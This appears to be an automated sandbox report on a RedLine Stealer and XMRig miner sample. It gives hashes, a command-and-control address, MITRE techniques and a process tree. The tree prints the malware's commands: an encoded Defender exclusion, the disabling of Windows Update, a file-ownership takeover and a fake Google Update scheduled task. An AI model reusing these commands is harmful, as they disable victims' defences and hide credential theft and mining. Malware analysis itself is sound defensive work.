redline | 348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4

Analysis

max time kernel
150s
max time network
138s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
15-08-2022 15:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b378f607d65dbbceded6f57aafd08629.exe
Size

12.6MB
MD5

b378f607d65dbbceded6f57aafd08629
SHA1

85c297246e6ef5d19b2b469783ecd5a13b217ac1
SHA256

348754315241bc2b6627b015f97354701bf65255db2604b679dc4762f30c1da4
SHA512

7a5b157f89ff3bb29be3b279e8645fd61acca9dec32537fb966ea2695a580d855618ec65b2e43576cb15ac61c90213f5dc68d5cb41c9af3b1b4da8514bc07748

Score

10^/10

redline xmrig 1137502411 discovery evasion exploit infostealer miner spyware vmprotect

Malware Config

Extracted

Family

redline

Botnet

1137502411

193.124.22.27:8362

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1948-66-0x0000000000400000-0x0000000000AAA000-memory.dmp	family_redline
behavioral1/memory/107444-73-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/107444-78-0x000000000041973E-mapping.dmp	family_redline
behavioral1/memory/107444-80-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/107444-79-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 16 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2140-131-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-133-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-135-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-136-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-137-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-139-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-141-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-142-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-143-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-145-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-146-0x000000014036EAC4-mapping.dmp	xmrig
behavioral1/memory/2140-148-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-150-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/2140-194-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3368-236-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/3368-238-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

Processes:

ABFrameworkSvc.exeupdater.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	ABFrameworkSvc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 5 IoCs

Processes:

Setup.exeWinRAR.exeupdater.exeABFrameworkSvc.exeupdater.exe

pid process

1480 Setup.exe
1948 WinRAR.exe
1460 updater.exe
1456 ABFrameworkSvc.exe
2584 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2492 takeown.exe
2508 icacls.exe
3164 takeown.exe
3180 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2492	takeown.exe
2508	icacls.exe
3164	takeown.exe
3180	icacls.exe

VMProtect packed file 10 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Setup.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\Setup.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\Setup.exe	vmprotect
behavioral1/memory/1480-65-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect
behavioral1/memory/1480-82-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect
\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe	vmprotect
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe	vmprotect
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe	vmprotect
behavioral1/memory/1460-99-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect
behavioral1/memory/1460-113-0x0000000000400000-0x0000000001407000-memory.dmp	vmprotect

Loads dropped DLL 8 IoCs

Processes:

b378f607d65dbbceded6f57aafd08629.exetaskeng.exeAppLaunch.exe

pid	process
536	b378f607d65dbbceded6f57aafd08629.exe
536	b378f607d65dbbceded6f57aafd08629.exe
536	b378f607d65dbbceded6f57aafd08629.exe
536	b378f607d65dbbceded6f57aafd08629.exe
536	b378f607d65dbbceded6f57aafd08629.exe
944	taskeng.exe
107444	AppLaunch.exe
944	taskeng.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2492 takeown.exe
2508 icacls.exe
3164 takeown.exe
3180 icacls.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2492	takeown.exe
2508	icacls.exe
3164	takeown.exe
3180	icacls.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

WinRAR.execonhost.exeupdater.exe

description	pid	process	target process
PID 1948 set thread context of 107444	1948	WinRAR.exe	AppLaunch.exe
PID 792 set thread context of 2140	792	conhost.exe	conhost.exe
PID 2584 set thread context of 3368	2584	updater.exe	explorer.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3056 sc.exe
2304 sc.exe
2320 sc.exe
2352 sc.exe
3008 sc.exe
3040 sc.exe
2284 sc.exe
2388 sc.exe
3024 sc.exe
3080 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

332 schtasks.exe
2400 schtasks.exe

pid	process
3056	sc.exe
2304	sc.exe
2320	sc.exe
2352	sc.exe
3008	sc.exe
3040	sc.exe
2284	sc.exe
2388	sc.exe
3024	sc.exe
3080	sc.exe

pid	process
332	schtasks.exe
2400	schtasks.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
2724	reg.exe
2736	reg.exe
2748	reg.exe
3128	reg.exe
3252	reg.exe
2420	reg.exe
2444	reg.exe
2468	reg.exe
3260	reg.exe
3244	reg.exe
2456	reg.exe
3116	reg.exe
3152	reg.exe
2480	reg.exe
2712	reg.exe
3268	reg.exe
3104	reg.exe
3140	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.execonhost.exeupdater.exeAppLaunch.exepowershell.execonhost.exeABFrameworkSvc.exepowershell.execonhost.exeupdater.exeexplorer.exe

pid	process
1480	Setup.exe
106808	conhost.exe
1460	updater.exe
107444	AppLaunch.exe
107444	AppLaunch.exe
588	powershell.exe
792	conhost.exe
1456	ABFrameworkSvc.exe
2640	powershell.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2584	updater.exe
2140	conhost.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe
3368	explorer.exe
2140	conhost.exe
3368	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

AppLaunch.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exeABFrameworkSvc.exetakeown.execonhost.exepowershell.exeupdater.exetakeown.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	107444	AppLaunch.exe
Token: SeDebugPrivilege	106808	conhost.exe
Token: SeShutdownPrivilege	107244	powercfg.exe
Token: SeShutdownPrivilege	107284	powercfg.exe
Token: SeShutdownPrivilege	107408	powercfg.exe
Token: SeShutdownPrivilege	952	powercfg.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeShutdownPrivilege	1944	powercfg.exe
Token: SeShutdownPrivilege	2024	powercfg.exe
Token: SeShutdownPrivilege	1696	powercfg.exe
Token: SeShutdownPrivilege	2000	powercfg.exe
Token: SeDebugPrivilege	792	conhost.exe
Token: SeDebugPrivilege	1456	ABFrameworkSvc.exe
Token: SeTakeOwnershipPrivilege	2492	takeown.exe
Token: SeLockMemoryPrivilege	2140	conhost.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeLockMemoryPrivilege	2140	conhost.exe
Token: SeDebugPrivilege	2584	updater.exe
Token: SeTakeOwnershipPrivilege	3164	takeown.exe
Token: SeLockMemoryPrivilege	3368	explorer.exe
Token: SeLockMemoryPrivilege	3368	explorer.exe

Suspicious use of FindShellTrayWindow 51 IoCs

Processes:

conhost.exe

pid	process
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe

Suspicious use of SendNotifyMessage 51 IoCs

Processes:

conhost.exe

pid	process
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe
2140	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b378f607d65dbbceded6f57aafd08629.exeWinRAR.exeSetup.execonhost.execmd.execmd.execmd.exetaskeng.exeAppLaunch.exeABFrameworkSvc.exeupdater.execonhost.exe

description	pid	process	target process
PID 536 wrote to memory of 1480	536	b378f607d65dbbceded6f57aafd08629.exe	Setup.exe
PID 536 wrote to memory of 1480	536	b378f607d65dbbceded6f57aafd08629.exe	Setup.exe
PID 536 wrote to memory of 1480	536	b378f607d65dbbceded6f57aafd08629.exe	Setup.exe
PID 536 wrote to memory of 1480	536	b378f607d65dbbceded6f57aafd08629.exe	Setup.exe
PID 536 wrote to memory of 1948	536	b378f607d65dbbceded6f57aafd08629.exe	WinRAR.exe
PID 536 wrote to memory of 1948	536	b378f607d65dbbceded6f57aafd08629.exe	WinRAR.exe
PID 536 wrote to memory of 1948	536	b378f607d65dbbceded6f57aafd08629.exe	WinRAR.exe
PID 536 wrote to memory of 1948	536	b378f607d65dbbceded6f57aafd08629.exe	WinRAR.exe
PID 1948 wrote to memory of 107444	1948	WinRAR.exe	AppLaunch.exe
PID 1948 wrote to memory of 107444	1948	WinRAR.exe	AppLaunch.exe
PID 1948 wrote to memory of 107444	1948	WinRAR.exe	AppLaunch.exe
PID 1948 wrote to memory of 107444	1948	WinRAR.exe	AppLaunch.exe
PID 1948 wrote to memory of 107444	1948	WinRAR.exe	AppLaunch.exe
PID 1948 wrote to memory of 107444	1948	WinRAR.exe	AppLaunch.exe
PID 1948 wrote to memory of 107444	1948	WinRAR.exe	AppLaunch.exe
PID 1948 wrote to memory of 107444	1948	WinRAR.exe	AppLaunch.exe
PID 1948 wrote to memory of 107444	1948	WinRAR.exe	AppLaunch.exe
PID 1480 wrote to memory of 106808	1480	Setup.exe	conhost.exe
PID 1480 wrote to memory of 106808	1480	Setup.exe	conhost.exe
PID 1480 wrote to memory of 106808	1480	Setup.exe	conhost.exe
PID 1480 wrote to memory of 106808	1480	Setup.exe	conhost.exe
PID 106808 wrote to memory of 107108	106808	conhost.exe	cmd.exe
PID 106808 wrote to memory of 107108	106808	conhost.exe	cmd.exe
PID 106808 wrote to memory of 107108	106808	conhost.exe	cmd.exe
PID 107108 wrote to memory of 107244	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 107244	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 107244	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 107284	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 107284	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 107284	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 107408	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 107408	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 107408	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 952	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 952	107108	cmd.exe	powercfg.exe
PID 107108 wrote to memory of 952	107108	cmd.exe	powercfg.exe
PID 106808 wrote to memory of 1624	106808	conhost.exe	cmd.exe
PID 106808 wrote to memory of 1624	106808	conhost.exe	cmd.exe
PID 106808 wrote to memory of 1624	106808	conhost.exe	cmd.exe
PID 106808 wrote to memory of 552	106808	conhost.exe	cmd.exe
PID 106808 wrote to memory of 552	106808	conhost.exe	cmd.exe
PID 106808 wrote to memory of 552	106808	conhost.exe	cmd.exe
PID 1624 wrote to memory of 332	1624	cmd.exe	schtasks.exe
PID 1624 wrote to memory of 332	1624	cmd.exe	schtasks.exe
PID 1624 wrote to memory of 332	1624	cmd.exe	schtasks.exe
PID 552 wrote to memory of 1808	552	cmd.exe	schtasks.exe
PID 552 wrote to memory of 1808	552	cmd.exe	schtasks.exe
PID 552 wrote to memory of 1808	552	cmd.exe	schtasks.exe
PID 944 wrote to memory of 1460	944	taskeng.exe	updater.exe
PID 944 wrote to memory of 1460	944	taskeng.exe	updater.exe
PID 944 wrote to memory of 1460	944	taskeng.exe	updater.exe
PID 107444 wrote to memory of 1456	107444	AppLaunch.exe	ABFrameworkSvc.exe
PID 107444 wrote to memory of 1456	107444	AppLaunch.exe	ABFrameworkSvc.exe
PID 107444 wrote to memory of 1456	107444	AppLaunch.exe	ABFrameworkSvc.exe
PID 107444 wrote to memory of 1456	107444	AppLaunch.exe	ABFrameworkSvc.exe
PID 1456 wrote to memory of 588	1456	ABFrameworkSvc.exe	powershell.exe
PID 1456 wrote to memory of 588	1456	ABFrameworkSvc.exe	powershell.exe
PID 1456 wrote to memory of 588	1456	ABFrameworkSvc.exe	powershell.exe
PID 1460 wrote to memory of 792	1460	updater.exe	conhost.exe
PID 1460 wrote to memory of 792	1460	updater.exe	conhost.exe
PID 1460 wrote to memory of 792	1460	updater.exe	conhost.exe
PID 1460 wrote to memory of 792	1460	updater.exe	conhost.exe
PID 792 wrote to memory of 1580	792	conhost.exe	cmd.exe
PID 792 wrote to memory of 1580	792	conhost.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\b378f607d65dbbceded6f57aafd08629.exe
"C:\Users\Admin\AppData\Local\Temp\b378f607d65dbbceded6f57aafd08629.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:536

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:106808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:107108

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:107244

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:107284

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:107408

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe\""
4⤵
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe\""
5⤵
- Creates scheduled task(s)
PID:332

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
- Suspicious use of WriteProcessMemory
PID:552

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
PID:1808

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:107444

C:\Users\Admin\AppData\Local\Temp\ABFrameworkSvc.exe
"C:\Users\Admin\AppData\Local\Temp\ABFrameworkSvc.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeABnAHMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwByAGwAaABxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYgBvAGUAIwA+AA=="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:2252

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:2284

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:2304

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:2320

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:2352

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:2388

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:2420

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:2444

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:2456

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:2468

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:2480

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2492

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2508

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2712

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2724

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2736

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2748

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:2760

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:2776

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:2792

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:2808

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:2824

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:2840

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:2856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe\""
5⤵
PID:2344

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe\""
6⤵
- Creates scheduled task(s)
PID:2400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
PID:2532

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
6⤵
PID:2564

C:\Windows\system32\taskeng.exe
taskeng.exe {79F0BF0B-78ED-49EE-9104-94CCB675C15B} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:944

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe"
3⤵
